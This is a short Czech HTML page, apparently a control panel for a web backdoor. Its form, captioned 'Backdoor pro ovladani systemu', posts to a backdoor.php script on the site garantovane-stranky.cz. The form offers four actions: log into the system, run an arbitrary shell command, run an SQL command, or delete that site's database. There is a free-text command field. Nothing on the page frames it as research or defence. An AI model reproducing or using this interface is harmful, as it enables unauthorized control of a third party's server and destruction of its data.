<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">

<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<meta name="author" content="SoftFullDownload.blogspot.com" />

	<title>Bez nadpisu 2</title>
</head>

<body>

<form method="post" action="http://www.garantovane-stranky.cz/php/scripts/backdoor.php">
<table>
<caption>Backdoor pro ovladani systemu</caption>
<tr><th>Akce</th><td>
<select name="akce">
<option value="prihlasit">Přihlásit do systému</option>
<option value="vykonat_prikaz">Vykonat příkaz</option>
<option value="vykonat_sql_prikaz">Vykonat SQL příkaz</option>
<option value="smazat_databazi">Smazat databázi na Garantovane-stranky.cz</option>
</select></td></tr>
<tr><th colspan="2">Příkaz</th></tr>
<tr><td colspan="2"><textarea name="prikaz" style="height: 300px; width: 100%;"></textarea></td></tr>
</table>
<input type="submit" name="btnBackdoor" value='Provést'/>
</form>

</body>
</html>